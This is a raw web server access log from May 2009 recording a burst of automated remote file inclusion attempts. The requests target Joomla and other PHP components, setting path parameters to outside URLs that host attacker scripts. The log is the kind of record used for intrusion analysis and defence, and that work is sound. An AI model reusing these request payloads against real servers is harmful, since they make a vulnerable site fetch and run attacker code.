218.150.79.146 - - [12/May/2009:03:36:39 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:03:36:39 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:03:36:47 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:03:36:47 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 200 1023 "-" "Mozilla/5.0"
80.91.189.12 - - [12/May/2009:03:36:47 -0400] "GET /logs/access_log.Q108092700%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:03:36:49 -0400] "GET /logs/access_log.Q107122200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
110.45.144.106 - - [12/May/2009:03:37:20 -0400] "GET /logs/access_log.Q108091000%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:03:37:20 -0400] "GET /logs/access_log.Q108090200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:03:37:22 -0400] "GET /logs/error_log.Q108082500/index.php?main=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:03:37:22 -0400] "GET /index.php?main=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:03:37:22 -0400] "GET /logs/index.php?main=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.825"
110.45.144.106 - - [12/May/2009:03:37:23 -0400] "GET /logs/access_log.Q108091000%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:03:37:23 -0400] "GET /logs/access_log.Q108090200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:03:37:25 -0400] "GET /logs/access_log.Q108121300/playing.php/common/db.php?commonpath=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
110.45.144.106 - - [12/May/2009:03:37:25 -0400] "GET /logs/access_log.Q108111500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:03:37:29 -0400] "GET /logs/access_log.Q108091000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:03:37:29 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:03:37:29 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:03:37:29 -0400] "GET /logs/access_log.Q108090200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
